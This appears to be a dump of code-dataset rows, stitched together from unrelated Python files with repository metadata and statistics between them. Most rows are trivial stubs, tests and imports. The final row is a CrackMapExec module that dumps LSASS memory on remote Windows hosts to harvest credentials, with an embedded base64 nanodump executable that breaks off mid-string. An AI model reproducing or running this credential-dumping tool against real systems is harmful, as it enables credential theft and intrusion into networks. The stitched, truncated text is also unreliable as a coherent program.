class NA_Nocturne_Bot_AurelionSol(Ratings):
pass
class NA_Nocturne_Bot_Azir(Ratings):
pass
class NA_Nocturne_Bot_Bard(Ratings):
pass
class NA_Nocturne_Bot_Blitzcrank(Ratings):
pass
class NA_Nocturne_Bot_Brand(Ratings):
pass
class NA_Nocturne_Bot_Braum(Ratings):
pass
class NA_Nocturne_Bot_Caitlyn(Ratings):
pass
class NA_Nocturne_Bot_Camille(Ratings):
pass
class NA_Nocturne_Bot_Cassiopeia(Ratings):
pass
class NA_Nocturne_Bot_Chogath(Ratings):
pass
class NA_Nocturne_Bot_Corki(Ratings):
pass
class NA_Nocturne_Bot_Darius(Ratings):
pass
class NA_Nocturne_Bot_Diana(Ratings):
pass
class NA_Nocturne_Bot_Draven(Ratings):
pass
class NA_Nocturne_Bot_DrMundo(Ratings):
pass
class NA_Nocturne_Bot_Ekko(Ratings):
pass
class NA_Nocturne_Bot_Elise(Ratings):
pass
class NA_Nocturne_Bot_Evelynn(Ratings):
pass
class NA_Nocturne_Bot_Ezreal(Ratings):
pass
class NA_Nocturne_Bot_Fiddlesticks(Ratings):
pass
class NA_Nocturne_Bot_Fiora(Ratings):
pass
class NA_Nocturne_Bot_Fizz(Ratings):
pass
class NA_Nocturne_Bot_Galio(Ratings):
pass
class NA_Nocturne_Bot_Gangplank(Ratings):
pass
class NA_Nocturne_Bot_Garen(Ratings):
pass
class NA_Nocturne_Bot_Gnar(Ratings):
pass
class NA_Nocturne_Bot_Gragas(Ratings):
pass
class NA_Nocturne_Bot_Graves(Ratings):
pass
class NA_Nocturne_Bot_Hecarim(Ratings):
pass
class NA_Nocturne_Bot_Heimerdinger(Ratings):
pass
class NA_Nocturne_Bot_Illaoi(Ratings):
pass
class NA_Nocturne_Bot_Irelia(Ratings):
pass
class NA_Nocturne_Bot_Ivern(Ratings):
pass
class NA_Nocturne_Bot_Janna(Ratings):
pass
class NA_Nocturne_Bot_JarvanIV(Ratings):
pass
class NA_Nocturne_Bot_Jax(Ratings):
pass
class NA_Nocturne_Bot_Jayce(Ratings):
pass
class NA_Nocturne_Bot_Jhin(Ratings):
pass
class NA_Nocturne_Bot_Jinx(Ratings):
pass
class NA_Nocturne_Bot_Kalista(Ratings):
pass
class NA_Nocturne_Bot_Karma(Ratings):
pass
class NA_Nocturne_Bot_Karthus(Ratings):
pass
class NA_Nocturne_Bot_Kassadin(Ratings):
pass
class NA_Nocturne_Bot_Katarina(Ratings):
pass
class NA_Nocturne_Bot_Kayle(Ratings):
pass
class NA_Nocturne_Bot_Kayn(Ratings):
pass
class NA_Nocturne_Bot_Kennen(Ratings):
pass
class NA_Nocturne_Bot_Khazix(Ratings):
pass
class NA_Nocturne_Bot_Kindred(Ratings):
pass
class NA_Nocturne_Bot_Kled(Ratings):
pass
class NA_Nocturne_Bot_KogMaw(Ratings):
pass
class NA_Nocturne_Bot_Leblanc(Ratings):
pass
class NA_Nocturne_Bot_LeeSin(Ratings):
pass
class NA_Nocturne_Bot_Leona(Ratings):
pass
class NA_Nocturne_Bot_Lissandra(Ratings):
pass
class NA_Nocturne_Bot_Lucian(Ratings):
pass
class NA_Nocturne_Bot_Lulu(Ratings):
pass
class NA_Nocturne_Bot_Lux(Ratings):
pass
class NA_Nocturne_Bot_Malphite(Ratings):
pass
class NA_Nocturne_Bot_Malzahar(Ratings):
pass
class NA_Nocturne_Bot_Maokai(Ratings):
pass
class NA_Nocturne_Bot_MasterYi(Ratings):
pass
class NA_Nocturne_Bot_MissFortune(Ratings):
pass
class NA_Nocturne_Bot_MonkeyKing(Ratings):
pass
class NA_Nocturne_Bot_Mordekaiser(Ratings):
pass
class NA_Nocturne_Bot_Morgana(Ratings):
pass
class NA_Nocturne_Bot_Nami(Ratings):
pass
class NA_Nocturne_Bot_Nasus(Ratings):
pass
class NA_Nocturne_Bot_Nautilus(Ratings):
pass
class NA_Nocturne_Bot_Nidalee(Ratings):
pass
class NA_Nocturne_Bot_Nocturne(Ratings):
pass
class NA_Nocturne_Bot_Nunu(Ratings):
pass
class NA_Nocturne_Bot_Olaf(Ratings):
pass
class NA_Nocturne_Bot_Orianna(Ratings):
pass
class NA_Nocturne_Bot_Ornn(Ratings):
pass
class NA_Nocturne_Bot_Pantheon(Ratings):
pass
class NA_Nocturne_Bot_Poppy(Ratings):
pass
class NA_Nocturne_Bot_Quinn(Ratings):
pass
class NA_Nocturne_Bot_Rakan(Ratings):
pass
class NA_Nocturne_Bot_Rammus(Ratings):
pass
class NA_Nocturne_Bot_RekSai(Ratings):
pass
class NA_Nocturne_Bot_Renekton(Ratings):
pass
class NA_Nocturne_Bot_Rengar(Ratings):
pass
class NA_Nocturne_Bot_Riven(Ratings):
pass
class NA_Nocturne_Bot_Rumble(Ratings):
pass
class NA_Nocturne_Bot_Ryze(Ratings):
pass
class NA_Nocturne_Bot_Sejuani(Ratings):
pass
class NA_Nocturne_Bot_Shaco(Ratings):
pass
class NA_Nocturne_Bot_Shen(Ratings):
pass
class NA_Nocturne_Bot_Shyvana(Ratings):
pass
class NA_Nocturne_Bot_Singed(Ratings):
pass
class NA_Nocturne_Bot_Sion(Ratings):
pass
class NA_Nocturne_Bot_Sivir(Ratings):
pass
class NA_Nocturne_Bot_Skarner(Ratings):
pass
class NA_Nocturne_Bot_Sona(Ratings):
pass
class NA_Nocturne_Bot_Soraka(Ratings):
pass
class NA_Nocturne_Bot_Swain(Ratings):
pass
class NA_Nocturne_Bot_Syndra(Ratings):
pass
class NA_Nocturne_Bot_TahmKench(Ratings):
pass
class NA_Nocturne_Bot_Taliyah(Ratings):
pass
class NA_Nocturne_Bot_Talon(Ratings):
pass
class NA_Nocturne_Bot_Taric(Ratings):
pass
class NA_Nocturne_Bot_Teemo(Ratings):
pass
class NA_Nocturne_Bot_Thresh(Ratings):
pass
class NA_Nocturne_Bot_Tristana(Ratings):
pass
class NA_Nocturne_Bot_Trundle(Ratings):
pass
class NA_Nocturne_Bot_Tryndamere(Ratings):
pass
class NA_Nocturne_Bot_TwistedFate(Ratings):
pass
class NA_Nocturne_Bot_Twitch(Ratings):
pass
class NA_Nocturne_Bot_Udyr(Ratings):
pass
class NA_Nocturne_Bot_Urgot(Ratings):
pass
class NA_Nocturne_Bot_Varus(Ratings):
pass
class NA_Nocturne_Bot_Vayne(Ratings):
pass
class NA_Nocturne_Bot_Veigar(Ratings):
pass
class NA_Nocturne_Bot_Velkoz(Ratings):
pass
class NA_Nocturne_Bot_Vi(Ratings):
pass
class NA_Nocturne_Bot_Viktor(Ratings):
pass
class NA_Nocturne_Bot_Vladimir(Ratings):
pass
class NA_Nocturne_Bot_Volibear(Ratings):
pass
class NA_Nocturne_Bot_Warwick(Ratings):
pass
class NA_Nocturne_Bot_Xayah(Ratings):
pass
class NA_Nocturne_Bot_Xerath(Ratings):
pass
class NA_Nocturne_Bot_XinZhao(Ratings):
pass
class NA_Nocturne_Bot_Yasuo(Ratings):
pass
class NA_Nocturne_Bot_Yorick(Ratings):
pass
class NA_Nocturne_Bot_Zac(Ratings):
pass
class NA_Nocturne_Bot_Zed(Ratings):
pass
class NA_Nocturne_Bot_Ziggs(Ratings):
pass
class NA_Nocturne_Bot_Zilean(Ratings):
pass
class NA_Nocturne_Bot_Zyra(Ratings):
pass
| 16.357314 | 46 | 0.776133 | 972 | 6,821 | 5.020576 | 0.151235 | 0.197951 | 0.42418 | 0.509016 | 0.814139 | 0.814139 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162879 | 6,821 | 416 | 47 | 16.396635 | 0.854641 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
ba8e7fad0df1057110ed00c412b2385782e55468 | 7 | py | Python | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | a[b1,:] | 7 | 7 | 0.428571 | 2 | 7 | 1.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 7 | 1 | 7 | 7 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba9becbbc55fb9f56c798be925fbf9607568b84b | 25 | py | Python | engine/__init__.py | yuanming-hu/elements | e9eccbd61ac45f178ea88b7b405aa2c01549337d | [
"MIT"
] | 265 | 2020-01-09T05:05:26.000Z | 2022-03-31T11:47:32.000Z | engine/__init__.py | TREYWANGCQU/taichi_elements | 6f8a03dcf5b407841b88f7b60cca2619e5cb79a5 | [
"MIT"
] | 76 | 2020-01-09T10:58:48.000Z | 2022-03-26T23:51:32.000Z | engine/__init__.py | TREYWANGCQU/taichi_elements | 6f8a03dcf5b407841b88f7b60cca2619e5cb79a5 | [
"MIT"
] | 50 | 2020-01-11T11:25:39.000Z | 2022-02-20T14:43:36.000Z | from . import mpm_solver
| 12.5 | 24 | 0.8 | 4 | 25 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
baa80674137e50b54fb7bc6aed3d4bd172f47620 | 31 | py | Python | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | null | null | null | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | null | null | null | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | 1 | 2019-01-19T07:11:04.000Z | 2019-01-19T07:11:04.000Z | print('I like play basketball') | 31 | 31 | 0.774194 | 5 | 31 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
244ed0dbac6f6997ddef2bc5ce039049b220e51b | 24 | py | Python | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 46 | 2015-09-19T00:33:26.000Z | 2021-10-20T21:17:14.000Z | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 32 | 2015-09-15T20:58:25.000Z | 2020-04-09T08:56:00.000Z | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 48 | 2016-01-08T21:00:46.000Z | 2022-03-24T02:32:54.000Z | def Execute():
pass
| 8 | 14 | 0.583333 | 3 | 24 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 24 | 2 | 15 | 12 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
79f7d4a0d30613931c5f898c20f1b20986831d9d | 29 | py | Python | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
] | null | null | null | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
] | null | null | null | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
] | null | null | null | # TODO: implement __init__.py | 29 | 29 | 0.793103 | 4 | 29 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.730769 | 0.931034 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 1 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
036dcc65c3792ebfe7de4bae2881c1a3079038f4 | 224 | py | Python | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | 1 | 2017-11-19T13:35:34.000Z | 2017-11-19T13:35:34.000Z | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | 3 | 2020-02-11T23:39:00.000Z | 2021-06-10T19:12:20.000Z | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | null | null | null | from .constants import * # noqa
from .logger import * # noqa
# logger = logging.getLogger('bl3ptrader')
# logger.setLevel(logging.DEBUG)
# ch = logging.StreamHandler()
# ch.setLevel(logging.DEBUG)
# logger.addHandler(ch)
| 24.888889 | 42 | 0.727679 | 26 | 224 | 6.269231 | 0.5 | 0.122699 | 0.245399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0.129464 | 224 | 8 | 43 | 28 | 0.830769 | 0.709821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0372f0c38bed62f61c61a37010908d027a1e45cd | 289 | py | Python | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 4 | 2020-10-14T15:01:02.000Z | 2021-09-30T14:17:26.000Z | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 1 | 2021-04-30T14:29:53.000Z | 2021-05-01T07:21:33.000Z | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 1 | 2020-07-31T19:57:24.000Z | 2020-07-31T19:57:24.000Z | class MockHandler:
def finish(*args, **kwargs):
pass
def current_user(*args, **kwargs):
return None
def get_json_body(*args, **kwargs):
pass
def get_query_argument(*args, **kwargs):
pass
def set_status(*args, **kwargs):
pass
| 18.0625 | 44 | 0.574394 | 34 | 289 | 4.705882 | 0.529412 | 0.3125 | 0.35 | 0.31875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.301038 | 289 | 15 | 45 | 19.266667 | 0.792079 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | true | 0.363636 | 0 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
ceea4a5be3b247ca2a7fcf6e785d602704c1f873 | 81 | py | Python | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | from .cmder import run
from .cmder import CMD_LINE_LENGTH
from .cmder import PMT
| 20.25 | 34 | 0.814815 | 14 | 81 | 4.571429 | 0.571429 | 0.421875 | 0.703125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 81 | 3 | 35 | 27 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cef6e62fb008fde842ffd535aded9c12251ea9b8 | 27 | py | Python | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | 1 | 2022-01-24T18:37:13.000Z | 2022-01-24T18:37:13.000Z | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | null | null | null | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | null | null | null | from .asgi import Backendpy | 27 | 27 | 0.851852 | 4 | 27 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3037f7257e3b9adfe75b6de5dcaea006310fcfee | 84,111 | py | Python | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | 3 | 2021-10-31T14:50:29.000Z | 2022-02-27T16:30:30.000Z | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | null | null | null | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | 1 | 2022-03-20T22:09:54.000Z | 2022-03-20T22:09:54.000Z | # nanodump module for CME python3
# author of the module : github.com/mpgn
# nanodump: https://github.com/helpsystems/nanodump
from io import StringIO
import os
import sys
import re
import time
import base64
class CMEModule:
name = 'nanodump'
description = "Get lsass dump using nanodump and parse the result with pypykatz"
supported_protocols = ['smb']
opsec_safe = True # not really
multiple_hosts = True
def options(self, context, module_options):
'''
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/shared/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
'''
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.nano_embeded = base64.b64decode("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